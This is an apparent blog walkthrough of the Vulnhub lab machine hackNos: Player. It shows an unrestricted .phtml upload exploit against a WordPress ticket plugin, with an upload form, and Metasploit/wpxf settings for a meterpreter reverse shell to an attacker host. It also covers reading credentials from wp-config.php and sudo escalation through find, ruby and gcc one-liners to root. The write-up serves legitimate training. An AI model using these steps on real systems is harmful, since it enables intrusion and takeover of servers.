hackNos: Player v1.1 | Vulnhub Walkthrough

hackNos is machine with an interesting mix of realism and CTF style tricks. Even-though the underlying vulnerabilities are pretty straightforward to exploit, this machine demands next level enumeration skills. Thanks to Rahul Gehlaut for this amazing box.

Level: Intermediate

You need to fire arp-scan or netdiscover to find the IP of hackNos. There are only two services- HTTP(80) and MySQL(3306).

Use arp-scan to discover IP address

Only interesting service is a website on port 80

Enumeration

I could see an apache default page but was unable to find any useful paths. I ran dirb with common, big word-lists, tried extension based dir-busting. Even tried my luck on cewl to generate a custom word-list. But I couldn’t find any leads.

Default page on port 80

After a good sleep after the hectic work week, I sat and thought though. In half an hour of enumeration, I found the clue on the default page itself, that the document root is /var/www/html/g@web. That usually means the default index.html page you are seeing is inside g@web folder. However , in this site the document root is not /var/www/html/g@web but it is /var/www/html (I know, information on the page is misleading but possibility a CTF style modification).

You need to browse to http://192.168.56.107/g@web/ to find a WordPress blog.

Hint on default page

WordPress blog

When it comes to WordPress enumeration, my favorite tool is wpscan. But make sure that you run wpscan using the API key, which you can generate from wpvulndb.com(You need to register a free account) to see all vulnerabilities.

wpscan --url http://192.168.56.107/g@web/ --api-token <token>

Run wpscan using the api-token to see vulnerabilities

When it comes to WordPress, not updating plugins can largely undermine the security of the website. WP Support Plus Responsive Ticket System v 7.1.3 is in use here, which is vulnerable to SQL injection, RCE via file upload and privilege escalation.

WP Support Plus Responsive Ticket System plugin is vulnerable to RCE, Privilege Escalation, SQL Injection etc.

Exploiting RCE for shell

If you read the advisory WPVDB ID-10119 for remote code execution, it is self explanatory. Our vulnerable plugin does not restrict the upload of .phtml, .php5 and similar lesser known PHP extensions, enabling us to upload reverse shell PHP code in .phtml format.

I used the reverse shell PHP payload in /usr/share/webshells/php/ folder which will be uploaded to http://192.168.56.107/g@web/wp-content/uploads/wpsp/ folder using below sample code. PHP reverse shell payload should be edited to match your netcat listener and should be named in .phtml or .php5 format.

<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://192.168.56.107/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>
</body>
</html>

Upload reverse shell PHP code as .phtml file

Reverse shell can be obtained using file upload

Alternatively we can use wordpress-exploit-framework, which is an awesome tool by rastating and it is pretty much like the Metasploit for WordPress. Tool supports Metasploit payloads and follows the familiar syntax of Metasploit.

Alternatively wordpress-exploit-framework can be used to exploit the issue

Configure reverse handler on Metasploit to get a shell

#commands to run the exploit module on wpxf
wpxf                  #command to start wordpress-exploit-framework
search wp_support
use exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload
set host 192.168.56.107
set target_uri /g@web
set payload meterpreter_reverse_tcp
set lport 8443
set lhost 192.168.56.103
#Do not forget to spin up a handler in Metasploit
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.103
set lport 8443
run

Shell is only a beginning

Way beyond shell was frustrating. I pursued various vectors including local exploits, reusing password disclosed on wp-config.php, cracking user passwords looted from WordPress database etc. Later I found the necessary hint from the wp_usermeta table inside the database in the form of meta_value.

Tip: You need an interactive shell to work with MySQL normally, in restrictive shells use python -c ‘import pty; pty.spawn(“/bin/sh”)’ to spawn an interactive shell.

mysql -u wp -p

Database credentials can be obtained from /var/www/html/g@web/wp-config.php

wp_usermeta table has the hint for privilege escalation

After few trial and error attempts I was able to login as security local user with the password we found earlier.

There are four users in the system

Logged in as security user using password from database

Linux-smart-enumeration is usually my trusty script on any Linux box for local enumeration. I found from LSE output that, the user named security has access to run find command as hackNos-boat. GTFOBins is an awesome project, which can help us in situations involving SUID or sudo misconfigurations. They maintain a curated list of all known attack vectors for Unix binaries. We can use below command to escalate our privileges.

#https://gtfobins.github.io/gtfobins/find/
sudo -u hackNos-boat find . -exec /bin/sh \; -quit

User has permission to run find command as hacknos-boat

Escalate privileges to hackNos-boat

The hackNos-boat user has similar access to run ruby as hunter. Hunter account has access to the user flag.

#https://gtfobins.github.io/gtfobins/ruby/
sudo -u hunter ruby -e 'exec "/bin/sh"'

User has permission to run ruby as hunter

User flag can be accessed from hunter account

Similarly, hunter has sudo access to gcc. At this point rooting is trivial.

#https://gtfobins.github.io/gtfobins/gcc/#shell
sudo gcc -wrapper /bin/sh,-s .

Hunter has access to run gcc with root privileges

Root access obtained

Root flag

Closing Thoughts

hackNos is a good machine with focus on enumeration. GTFO chaining scenario was fun. Overall a solid challenge.